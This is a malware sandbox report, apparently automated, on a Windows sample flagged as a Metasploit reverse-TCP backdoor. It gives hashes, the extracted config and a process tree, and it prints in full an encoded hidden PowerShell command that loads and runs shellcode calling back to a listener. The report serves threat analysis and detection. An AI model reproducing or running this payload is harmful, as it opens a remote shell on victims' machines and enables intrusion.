metasploit | 6dce2e6b67bd6067b62a6de675ed8aae2cf12e1686200f4e5a98b88b11d8b041

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe
Size

124KB
MD5

1d00fc610526a7d996b5a264dacb8f38
SHA1

805f34f9f2ba22acc0e46901fe6d51824df1edbc
SHA256

6dce2e6b67bd6067b62a6de675ed8aae2cf12e1686200f4e5a98b88b11d8b041
SHA512

5987ac35bb5ab1dfdad6d9e85dee2bd37997fc7b1ec8207a8a15f4ddd5f3bbfec77643fe04b0d34df3eb1ac0366777d79208ee1330912940c92d617775a9d555
SSDEEP

3072:LZeHqJUyvkbE4M2OLh8fwFVRv7IuMBbgWwXNO:LZZ7MY4bgFvvYCf9

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.0.89:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1800 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1800 powershell.exe
2744 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1752 1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe
Token: SeDebugPrivilege 1800 powershell.exe
Token: SeDebugPrivilege 2744 powershell.exe

pid	process
1800	powershell.exe

pid	process
1800	powershell.exe
2744	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1752	1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.execmd.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 1752 wrote to memory of 2444	1752	1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe	cmd.exe
PID 1752 wrote to memory of 2444	1752	1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe	cmd.exe
PID 1752 wrote to memory of 2444	1752	1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe	cmd.exe
PID 2444 wrote to memory of 1800	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 1800	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 1800	2444	cmd.exe	powershell.exe
PID 1800 wrote to memory of 2744	1800	powershell.exe	powershell.exe
PID 1800 wrote to memory of 2744	1800	powershell.exe	powershell.exe
PID 1800 wrote to memory of 2744	1800	powershell.exe	powershell.exe
PID 1800 wrote to memory of 2744	1800	powershell.exe	powershell.exe
PID 2744 wrote to memory of 2696	2744	powershell.exe	csc.exe
PID 2744 wrote to memory of 2696	2744	powershell.exe	csc.exe
PID 2744 wrote to memory of 2696	2744	powershell.exe	csc.exe
PID 2744 wrote to memory of 2696	2744	powershell.exe	csc.exe
PID 2696 wrote to memory of 2844	2696	csc.exe	cvtres.exe
PID 2696 wrote to memory of 2844	2696	csc.exe	cvtres.exe
PID 2696 wrote to memory of 2844	2696	csc.exe	cvtres.exe
PID 2696 wrote to memory of 2844	2696	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1d00fc610526a7d996b5a264dacb8f38_JaffaCakes118.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAByADIAMwBWACAAPQAgACcAJABPAE8AVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABPAE8AVQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADcAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGYAMwAsADAAeAA3ADAALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAAwAGYALAAwAHgAOQAwACwAMAB4AGEAMwAsADAAeAA2AGUALAAwAHgAZQBmACwAMAB4ADYAMQAsADAAeABkAGMALAAwAHgANQBmACwAMAB4ADMAZAAsADAAeAAwADUALAAwAHgAOQA3ACwAMAB4AGYAMgAsADAAeABmADEALAAwAHgANABmACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgAYQAzACwAMAB4ADQAMwAsADAAeAAwADYALAAwAHgAMgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeABlADAALAAwAHgAYwA3ACwAMAB4ADMAMQAsADAAeAA2AGEALAAwAHgANwBjACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYQBjACwAMAB4ADIAYwAsADAAeAAzAGMALAAwAHgAMABlACwAMAB4ADUAMAAsADAAeAAyAGUALAAwAHgAMQAxACwAMAB4AGYAMAAsADAAeAA2ADkALAAwAHgAZQAxACwAMAB4ADYANAAsADAAeABmADEALAAwAHgAYQBlACwAMAB4AGIANAAsADAAeAAwADMALAAwAHgAMQBlACwAMAB4ADYAMgAsADAAeAAxADEALAAwAHgANgA3ACwAMAB4AGIAMgAsADAAeAA5ADMALAAwAHgAMQA2ACwAMAB4ADMANQAsADAAeAAwAGYALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAzADEALAAwAHgAMgBmACwAMAB4AGUAZAAsADAAeAA3AGQALAAwAHgAOAA1ACwAMAB4AGMANAAsADAAeAA0ADEALAAwAHgANwBjACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAMQAyACwAMAB4ADYANgAsADAAeAA4ADYALAAwAHgAMwBiACwAMAB4AGYAYQAsADAAeABiADYALAAwAHgAMgA3ACwAMAB4AGUAZgAsADAAeAA3AGUALAAwAHgANwBmACwAMAB4ADUAMwAsADAAeAAzADMALAAwAHgAYwA4ACwAMAB4AGYANAAsADAAeABhADgALAAwAHgAYwAwACwAMAB4AGMAYgAsADAAeABkAGMALAAwAHgAZQAwACwAMAB4ADIAOQAsADAAeABmAGEALAAwAHgAMgAwACwAMAB4AGEAZQAsADAAeAAxADcALAAwAHgAMwAyACwAMAB4AGEAZAAsADAAeABhAGUALAAwAHgANQAwACwAMAB4AGYANQAsADAAeAA0AGQALAAwAHgAYwA1ACwAMAB4AGEAYQAsADAAeAAwADUALAAwAHgAZgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADIAZQAsADAAeAA2AGEALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeABhADUALAAwAHgAYwBjACwAMAB4ADQAYgAsADAAeABlADEALAAwAHgANgBhACwAMAB4ADgAYQAsADAAeAAxADgALAAwAHgAZQBkACwAMAB4AGMANwAsADAAeABkADgALAAwAHgANAA3ACwAMAB4AGYAMgAsADAAeABkADYALAAwAHgAMABkACwAMAB4AGYAYwAsADAAeAAwAGUALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABkADMALAAwAHgAOAA2ACwAMAB4ADIANwAsADAAeAA5ADcALAAwAHgAZgA3ACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAYgA2ACwAMAB4AGEAZQAsADAAeABhADkALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABiADEALAAwAHgAMQA2ACwAMAB4ADAAYwAsADAAeAA2ADIALAAwAHgAYgA5ACwAMAB4AGIANQAsADAAeAA1AGIALAAwAHgAMQAyACwAMAB4ADQAMgAsADAAeAA0ADYALAAwAHgANgA0ACwAMAB4ADQAZQAsADAAeABkADUALAAwAHgAOABhACwAMAB4AGEAOAAsADAAeAA3ADEALAAwAHgAMgA1ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4ADEANwAsADAAeAAwAGEALAAwAHgAMQA3ACwAMAB4ADgAZAAsADAAeAAxAGIALAAwAHgAYwAzACwAMAB4AGIAMQAsADAAeAA0AGEALAAwAHgAMgBkACwAMAB4AGMAMwAsADAAeAA0ADIALAAwAHgAOAA0ACwAMAB4ADkANQAsADAAeAA4ADQALAAwAHgAYgBkACwAMAB4ADIANQAsADAAeABlADYALAAwAHgAOABkACwAMAB4ADcAOQAsADAAeAA3ADEALAAwAHgAYgA2ACwAMAB4AGEANQAsADAAeABhADgALAAwAHgAZgBhACwAMAB4ADUAZAAsADAAeAAzADYALAAwAHgANQA1ACwAMAB4ADIAZgAsADAAeABjAGIALAAwAHgAMwBjACwAMAB4AGMAMQAsADAAeAAxADAALAAwAHgAYQA0ACwAMAB4ADQAMQAsADAAeAA0ADgALAAwAHgAZgA5ACwAMAB4AGIANwAsADAAeAA0ADEALAAwAHgANwBiACwAMAB4AGEANQAsADAAeAAzAGUALAAwAHgAYQA3ACwAMAB4ADIAYgAsADAAeAAwADUALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeAA4AGIALAAwAHgAZgA1ACwAMAB4AGQAMQAsADAAeAAyADgALAAwAHgANgAzACwAMAB4ADEAYwAsADAAeABkAGUALAAwAHgAMQA3ACwAMAB4ADkAMwAsADAAeAAxAGYALAAwAHgAMwA0ACwAMAB4ADMAMAAsADAAeAAzADkALAAwAHgAZgAwACwAMAB4AGUAMQAsADAAeAA2ADgALAAwAHgAZAA1ACwAMAB4ADYAOQAsADAAeABhADgALAAwAHgAZQAzACwAMAB4ADQANAAsADAAeAA3ADUALAAwAHgANgA2ACwAMAB4ADgAZQAsADAAeAA0ADYALAAwAHgAZgBkACwAMAB4ADgANQAsADAAeAA2AGUALAAwAHgAMAA4ACwAMAB4AGYANgAsADAAeABlADAALAAwAHgANwBjACwAMAB4AGYAYwAsADAAeABmADYALAAwAHgAYgBlACwAMAB4AGQAZgAsADAAeABhAGEALAAwAHgAMAA5ACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgANQAyACwAMAB4ADkAYwAsADAAeAA5ADIALAAwAHgAZABjACwAMAB4ADAANQAsADAAeAAwADgALAAwAHgAOQA5ACwAMAB4ADMAOQAsADAAeAA2ADEALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAA2AGMALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYwBmACwAMAB4ADkANAAsADAAeAA1AGUALAAwAHgAMQA3ACwAMAB4AGQAMAAsADAAeAA2ADQALAAwAHgAMAA5ACwAMAB4ADcAZAAsADAAeABkADAALAAwAHgAMABjACwAMAB4AGUAZAAsADAAeAAyADUALAAwAHgAOAAzACwAMAB4ADIAOQAsADAAeABmADIALAAwAHgAZgAzACwAMAB4AGIANwAsADAAeABlADIALAAwAHgANgA3ACwAMAB4AGYAYwAsADAAeABlADEALAAwAHgANQA3ACwAMAB4ADIAZgAsADAAeAA5ADQALAAwAHgAMABmACwAMAB4ADgAZQAsADAAeAAwADcALAAwAHgAMwBiACwAMAB4AGUAZgAsADAAeABlADUALAAwAHgAOQA5ACwAMAB4ADAANwAsADAAeAAyADYALAAwAHgAYwAzACwAMAB4AGUAZgAsADAAeAA2ADkALAAwAHgAZgBhADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAA1AE0AegB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAA1AE0AegB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAA1AE0AegB4ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgAyADMAVgApACkAOwAkADYAMwBVAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAFkAVwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABpAFkAVwAgACQANgAzAFUAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA2ADMAVQBTACAAJABlACIAOwB9AA==
2⤵
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAByADIAMwBWACAAPQAgACcAJABPAE8AVQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABPAE8AVQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwAzACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeAA3ADQALAAwAHgANABhACwAMAB4ADcAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGYAMwAsADAAeAA3ADAALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAAwAGYALAAwAHgAOQAwACwAMAB4AGEAMwAsADAAeAA2AGUALAAwAHgAZQBmACwAMAB4ADYAMQAsADAAeABkAGMALAAwAHgANQBmACwAMAB4ADMAZAAsADAAeAAwADUALAAwAHgAOQA3ACwAMAB4AGYAMgAsADAAeABmADEALAAwAHgANABmACwAMAB4ADQAMgAsADAAeAA3ADkALAAwAHgAYQAzACwAMAB4ADQAMwAsADAAeAAwADYALAAwAHgAMgBjACwAMAB4ADUANwAsADAAeAA2AGQALAAwAHgAZQA3ACwAMAB4AGQAZQAsADAAeABlADAALAAwAHgAYwA3ACwAMAB4ADMAMQAsADAAeAA2AGEALAAwAHgANwBjACwAMAB4AGYAMAAsADAAeAAwAGMALAAwAHgAYQBjACwAMAB4ADIAYwAsADAAeAAzAGMALAAwAHgAMABlACwAMAB4ADUAMAAsADAAeAAyAGUALAAwAHgAMQAxACwAMAB4AGYAMAAsADAAeAA2ADkALAAwAHgAZQAxACwAMAB4ADYANAAsADAAeABmADEALAAwAHgAYQBlACwAMAB4AGIANAAsADAAeAAwADMALAAwAHgAMQBlACwAMAB4ADYAMgAsADAAeAAxADEALAAwAHgANgA3ACwAMAB4AGIAMgAsADAAeAA5ADMALAAwAHgAMQA2ACwAMAB4ADMANQAsADAAeAAwAGYALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAzADEALAAwAHgAMgBmACwAMAB4AGUAZAAsADAAeAA3AGQALAAwAHgAOAA1ACwAMAB4AGMANAAsADAAeAA0ADEALAAwAHgANwBjACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAMQAyACwAMAB4ADYANgAsADAAeAA4ADYALAAwAHgAMwBiACwAMAB4AGYAYQAsADAAeABiADYALAAwAHgAMgA3ACwAMAB4AGUAZgAsADAAeAA3AGUALAAwAHgANwBmACwAMAB4ADUAMwAsADAAeAAzADMALAAwAHgAYwA4ACwAMAB4AGYANAAsADAAeABhADgALAAwAHgAYwAwACwAMAB4AGMAYgAsADAAeABkAGMALAAwAHgAZQAwACwAMAB4ADIAOQAsADAAeABmAGEALAAwAHgAMgAwACwAMAB4AGEAZQAsADAAeAAxADcALAAwAHgAMwAyACwAMAB4AGEAZAAsADAAeABhAGUALAAwAHgANQAwACwAMAB4AGYANQAsADAAeAA0AGQALAAwAHgAYwA1ACwAMAB4AGEAYQAsADAAeAAwADUALAAwAHgAZgAwACwAMAB4AGQAZQAsADAAeAA2ADgALAAwAHgANwA3ACwAMAB4ADIAZQAsADAAeAA2AGEALAAwAHgANgBmACwAMAB4AGQAZgAsADAAeABhADUALAAwAHgAYwBjACwAMAB4ADQAYgAsADAAeABlADEALAAwAHgANgBhACwAMAB4ADgAYQAsADAAeAAxADgALAAwAHgAZQBkACwAMAB4AGMANwAsADAAeABkADgALAAwAHgANAA3ACwAMAB4AGYAMgAsADAAeABkADYALAAwAHgAMABkACwAMAB4AGYAYwAsADAAeAAwAGUALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABkADMALAAwAHgAOAA2ACwAMAB4ADIANwAsADAAeAA5ADcALAAwAHgAZgA3ACwAMAB4AGMAMwAsADAAeABmAGMALAAwAHgAYgA2ACwAMAB4AGEAZQAsADAAeABhADkALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABiADEALAAwAHgAMQA2ACwAMAB4ADAAYwAsADAAeAA2ADIALAAwAHgAYgA5ACwAMAB4AGIANQAsADAAeAA1AGIALAAwAHgAMQAyACwAMAB4ADQAMgAsADAAeAA0ADYALAAwAHgANgA0ACwAMAB4ADQAZQAsADAAeABkADUALAAwAHgAOABhACwAMAB4AGEAOAAsADAAeAA3ADEALAAwAHgAMgA1ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAyACwAMAB4ADEANwAsADAAeAAwAGEALAAwAHgAMQA3ACwAMAB4ADgAZAAsADAAeAAxAGIALAAwAHgAYwAzACwAMAB4AGIAMQAsADAAeAA0AGEALAAwAHgAMgBkACwAMAB4AGMAMwAsADAAeAA0ADIALAAwAHgAOAA0ACwAMAB4ADkANQAsADAAeAA4ADQALAAwAHgAYgBkACwAMAB4ADIANQAsADAAeABlADYALAAwAHgAOABkACwAMAB4ADcAOQAsADAAeAA3ADEALAAwAHgAYgA2ACwAMAB4AGEANQAsADAAeABhADgALAAwAHgAZgBhACwAMAB4ADUAZAAsADAAeAAzADYALAAwAHgANQA1ACwAMAB4ADIAZgAsADAAeABjAGIALAAwAHgAMwBjACwAMAB4AGMAMQAsADAAeAAxADAALAAwAHgAYQA0ACwAMAB4ADQAMQAsADAAeAA0ADgALAAwAHgAZgA5ACwAMAB4AGIANwAsADAAeAA0ADEALAAwAHgANwBiACwAMAB4AGEANQAsADAAeAAzAGUALAAwAHgAYQA3ACwAMAB4ADIAYgAsADAAeAAwADUALAAwAHgAMQAxACwAMAB4ADcAOAAsADAAeAA4AGIALAAwAHgAZgA1ACwAMAB4AGQAMQAsADAAeAAyADgALAAwAHgANgAzACwAMAB4ADEAYwAsADAAeABkAGUALAAwAHgAMQA3ACwAMAB4ADkAMwAsADAAeAAxAGYALAAwAHgAMwA0ACwAMAB4ADMAMAAsADAAeAAzADkALAAwAHgAZgAwACwAMAB4AGUAMQAsADAAeAA2ADgALAAwAHgAZAA1ACwAMAB4ADYAOQAsADAAeABhADgALAAwAHgAZQAzACwAMAB4ADQANAAsADAAeAA3ADUALAAwAHgANgA2ACwAMAB4ADgAZQAsADAAeAA0ADYALAAwAHgAZgBkACwAMAB4ADgANQAsADAAeAA2AGUALAAwAHgAMAA4ACwAMAB4AGYANgAsADAAeABlADAALAAwAHgANwBjACwAMAB4AGYAYwAsADAAeABmADYALAAwAHgAYgBlACwAMAB4AGQAZgAsADAAeABhAGEALAAwAHgAMAA5ACwAMAB4ADEANQAsADAAeAA3ADUALAAwAHgANQAyACwAMAB4ADkAYwAsADAAeAA5ADIALAAwAHgAZABjACwAMAB4ADAANQAsADAAeAAwADgALAAwAHgAOQA5ACwAMAB4ADMAOQAsADAAeAA2ADEALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAA2AGMALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeABmADcALAAwAHgAYwBmACwAMAB4ADkANAAsADAAeAA1AGUALAAwAHgAMQA3ACwAMAB4AGQAMAAsADAAeAA2ADQALAAwAHgAMAA5ACwAMAB4ADcAZAAsADAAeABkADAALAAwAHgAMABjACwAMAB4AGUAZAAsADAAeAAyADUALAAwAHgAOAAzACwAMAB4ADIAOQAsADAAeABmADIALAAwAHgAZgAzACwAMAB4AGIANwAsADAAeABlADIALAAwAHgANgA3ACwAMAB4AGYAYwAsADAAeABlADEALAAwAHgANQA3ACwAMAB4ADIAZgAsADAAeAA5ADQALAAwAHgAMABmACwAMAB4ADgAZQAsADAAeAAwADcALAAwAHgAMwBiACwAMAB4AGUAZgAsADAAeABlADUALAAwAHgAOQA5ACwAMAB4ADAANwAsADAAeAAyADYALAAwAHgAYwAzACwAMAB4AGUAZgAsADAAeAA2ADkALAAwAHgAZgBhADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAA1AE0AegB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAA1AE0AegB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAA1AE0AegB4ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgAyADMAVgApACkAOwAkADYAMwBVAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABpAFkAVwAgAD0AIAAkAGUAbgB2ADoAUwB5